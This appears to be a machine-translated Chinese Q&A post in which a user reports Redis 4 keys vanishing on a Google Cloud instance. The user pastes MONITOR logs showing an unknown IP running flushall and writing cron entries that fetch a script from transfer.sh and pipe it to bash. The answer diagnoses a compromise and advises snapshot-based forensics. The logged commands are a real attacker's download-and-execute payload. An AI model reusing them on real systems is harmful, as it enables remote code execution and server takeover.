发生了一个奇怪的问题。我有一个运行redis 4的谷歌云实例。问题是Redis数据/密钥在插入一些随机小时或分钟后自动删除。
当我使用带有MONITOR命令的redis-cli时,我发现了以下内容:
1525399477.663192 [0 122.114.179.53:47936]" info"
1525399487.102961 [0 122.114.179.53:55176]" COMMAND"
1525399487.546006 [0 122.114.179.53:55176]" flushall"
1525399488.214514 [0 122.114.179.53:55176]" set" "备份服务器1" " \ t \ n * / 2 * * * * curl -s https://transfer.sh/mQnwD/tmp.CG62KOYFtW> .cmd&& bash .cmd \ n \ t"
1525399488.435296 [0 122.114.179.53:55176]" set" "备份服务器2" " \ t \ n * / 5 * * * * wget -O .cmd https://transfer.sh/mQnwD/tmp.CG62KOYFtW&& bash .cmd \ n \ t"
1525399488.661485 [0 122.114.179.53:55176]" set" " Backup3" " \ t \ n * / 10 * * * * lynx -source https://transfer.sh/mQnwD /tmp.CG62KOYFtW> .cmd&& bash .cmd \ n \ t"
我不知道这个IP地址:122.114.179.53
由于
答案 0 :(得分:0)
您的Google Compute Engine实例似乎已被黑客入侵。
我强烈建议您停止它,拍摄磁盘快照并使用受影响实例的快照创建一个新实例作为辅助磁盘来执行取证分析。